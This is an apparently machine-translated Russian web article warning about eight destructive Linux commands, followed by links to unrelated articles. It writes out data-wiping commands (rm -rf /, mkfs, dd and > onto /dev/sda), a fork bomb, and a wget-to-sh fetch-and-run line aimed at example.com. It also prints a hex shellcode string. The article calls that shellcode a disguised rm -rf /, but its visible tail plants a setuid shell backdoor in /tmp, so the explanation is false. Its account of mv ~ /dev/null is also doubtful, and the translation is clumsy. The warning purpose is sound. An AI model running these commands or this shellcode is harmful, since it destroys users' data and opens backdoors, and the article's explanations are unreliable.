8 смертоносных команд, которые никогда не следует запускать в Linux

8 смертоносных команд, которые никогда не следует запускать в Linux

Команды терминала в Linux весьма разрушительны: если вы запустите команду, она разрушит вашу систему. Linux не требует подтверждения при выполнении какой-либо команды.

Знание того, какие команды не следует запускать в Linux, поможет защитить вашу систему при работе в Linux. Ниже приведены 8 смертельно опасных команд, которые никогда не следует запускать в Linux.

8 смертоносных команд, которые никогда не следует запускать в Linux

1. rm -rf/ — удалить всё

Команда rm -rf / удалит все, включая файлы на жестком диске и файлы на мультимедийных устройствах, подключенных к вашему компьютеру.

Чтобы лучше понять эту команду, проанализируйте ее следующим образом:

  • rm – Удалить следующие файлы.
  • -rf – запускает rm (удаляет все файлы и папки внутри указанной папки) и принудительно удаляет все файлы без предварительного запроса.
  • / – Сообщает, что rm (скажем, rm) запускается в корневом каталоге, включая все файлы на вашем компьютере.

Linux с радостью последует этой команде и удалит все, не предупреждая вас, поэтому будьте осторожны при использовании этой команды.

Кроме того, команда rm используется очень опасными способами. Например, rm –rf ~ удалит все файлы в вашей домашней папке, а rm -rf .* удалит все ваши файлы конфигурации.

2. Замаскированная команда rm –rf/

Вот фрагмент кода, разбросанный по сети:

char esp[] __attribute__ ((section(".text"))) /* выпуск esp */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" " \xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7 " "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80 \x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp - p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

По сути, это другая версия rm –rf/ – выполнение этой команды также удалит все ваши файлы, как и запуск rm –rf/.

3. :(){ :|: & };: – Тип блокбастера

8 смертоносных команд, которые никогда не следует запускать в Linux

Приведенная ниже командная строка выглядит очень простой, но ее функция на самом деле очень опасна:

:(){ :|: & };:

Эта короткая команда создаст новые копии самого себя. То есть сам процесс резервного копирования будет непрерывным и быстро приведет к заполнению вашего процессора и памяти.

Также это может привести к зависанию компьютера. По сути, это атака типа «отказ в обслуживании» (DoS).

4. mkfs.ext4 /dev/sda1 — форматы жестких дисков.

Команду mkfs.ext4 /dev/sda1 довольно легко понять:

  • mkfs.ext4 — создает файловую систему ext4 на следующем устройстве.
  • /dev/sda1 — идентифицирует первый раздел на первом жестком диске, который может быть используемым жестким диском.

Объединение этих двух команд эквивалентно форматированию диска C: в Windows — удалите все файлы в первом разделе и замените их новой файловой системой.

Эта команда может иметь множество различных форматов, например: mkfs.ext3 /dev/sdb2 отформатирует второй раздел на втором жестком диске в файловую систему ext3.

5. команда > /dev/sda — запись напрямую на жесткий диск

8 смертоносных команд, которые никогда не следует запускать в Linux

Командная строка > /dev/sda — запустите команду и выведите результат этой команды непосредственно на ваш первый жесткий диск, записывая данные непосредственно на жесткий диск и уничтожая вашу файловую систему.

  • команда – запустить команду (может быть любая команда).
  • > – отправляет вывод команды в следующее место.
  • /dev/sda — запись вывода команды непосредственно на жесткий диск.

6. dd if=/dev/random of=/dev/sda – записывает на жесткий диск ненужные данные.

Строка dd if=/dev/random of=/dev/sda удалит данные на одном из ваших жестких дисков.

  • dd – предназначен для выполнения низкоуровневого копирования из одного места в другое.
  • if=/dev/random — используйте /dev/random в качестве входных данных — вы можете увидеть адреса типа /dev/zero.
  • of=/dev/sda — вывод на первый жесткий диск, заменяя файловую систему случайными глупыми данными.

7. mv ~ /dev/null — переместите домашний каталог в черную дыру.

/dev/null — перемещение чего-либо в /dev/null равносильно его уничтожению. Думайте о /dev/null как о черной дыре. mv ~ /dev/null отправит все ваши личные файлы в черную дыру.

  • mv – переместить следующий файл или папку в другое место.
  • ~ – Вся ваша домашняя папка.
  • /dev/null — переместите домашнюю папку в /dev/null, это уничтожит все ваши файлы и удалит исходные копии.

8. wget http://example.com/something -O – | sh – загрузить и запустить скрипт

Приведенная выше команда загрузит сценарий из Интернета и отправит его в sh, который выполнит содержимое сценария. Это может быть опасно, если вы не уверены, что такое сценарий, или у вас нет надежного источника сценария — не запускайте ненадежные сценарии.

wget – скачать файл.

http://example.com/something – скачивайте файлы отсюда.

| – Направьте (отправьте) выходные данные команды wget (файл загруженной версии) непосредственно в другую команду.

sh – отправить файл команде sh.

См. еще несколько статей ниже:

Веселиться!


Как убрать уведомление о запросе на авторские права в правом углу экрана в Windows 10

Как убрать уведомление о запросе на авторские права в правом углу экрана в Windows 10

Вы видите уведомление об активации Windows 10 в правом углу экрана? В этой статье вы узнаете, как удалить уведомление о запросе на авторские права в Windows 10.

Инструкция от А-Я как установить Windows 10 сборка 14393.222

Инструкция от А-Я как установить Windows 10 сборка 14393.222

Недавно Microsoft выпустила последнее накопительное обновление для пользователей ПК с Windows 10 под названием Build 14393.222. Это обновление, выпущенное для Windows 10, в основном исправляет ошибки на основе отзывов пользователей и повышает производительность операционной системы.

Защитите свою компьютерную сеть с помощью хоста Bastion всего за 3 шага

Защитите свою компьютерную сеть с помощью хоста Bastion всего за 3 шага

Есть ли в вашей локальной сети компьютеры, которым требуется внешний доступ? Использование хоста-бастиона в качестве привратника для вашей сети может быть хорошим решением.

Как создать клавишу Windows, если ваша клавиатура недоступна

Как создать клавишу Windows, если ваша клавиатура недоступна

Если вы предпочитаете использовать старую классическую клавиатуру, например IBM Model M, на которой нет физической клавиши Windows, есть простой способ добавить ее, позаимствовав клавишу, которую вы не часто используете.

3 способа быстро очистить все журналы событий в Windows 10

3 способа быстро очистить все журналы событий в Windows 10

Иногда вам может потребоваться удалить все старые журналы событий сразу. В этом руководстве Quantrimang.com покажет вам 3 способа быстрого удаления всех журналов событий в средстве просмотра событий Windows 10.

Методы поддельного IP помогают вам получить анонимный доступ

Методы поддельного IP помогают вам получить анонимный доступ

Во многих предыдущих статьях мы упоминали, что сохранять анонимность в Интернете чрезвычайно важно. Частная информация утекает каждый год, что делает безопасность в Интернете все более необходимой. По этой же причине нам следует использовать виртуальные IP-адреса. Ниже мы узнаем о методах создания поддельных IP-адресов!

Как создать режим прозрачного фона в Windows 10

Как создать режим прозрачного фона в Windows 10

WindowTop — это инструмент, который позволяет затемнять все окна приложений и программ, запущенных на компьютерах с Windows 10. Или вы можете использовать интерфейс с темным фоном в Windows.

Как отключить языковую панель на панели задач Windows 8

Как отключить языковую панель на панели задач Windows 8

Языковая панель в Windows 8 — это миниатюрная языковая панель инструментов, предназначенная для автоматического отображения на экране рабочего стола. Однако многие люди хотят скрыть эту языковую панель на панели задач.

Как настроить WEP, WPA, WPA2 для роутера Linksys

Как настроить WEP, WPA, WPA2 для роутера Linksys

Беспроводное подключение сегодня является необходимостью, и поэтому безопасность беспроводной сети необходима для обеспечения безопасности вашей внутренней сети.

Советы по оптимизации скорости интернет-соединения от Linksys

Советы по оптимизации скорости интернет-соединения от Linksys

Увеличение скорости Интернета имеет важное значение для оптимизации сетевого подключения. Вы можете получить оптимальные впечатления от развлечений и работы, используя компьютеры, телевизоры с возможностью подключения к Интернету, игровые приставки и т. д.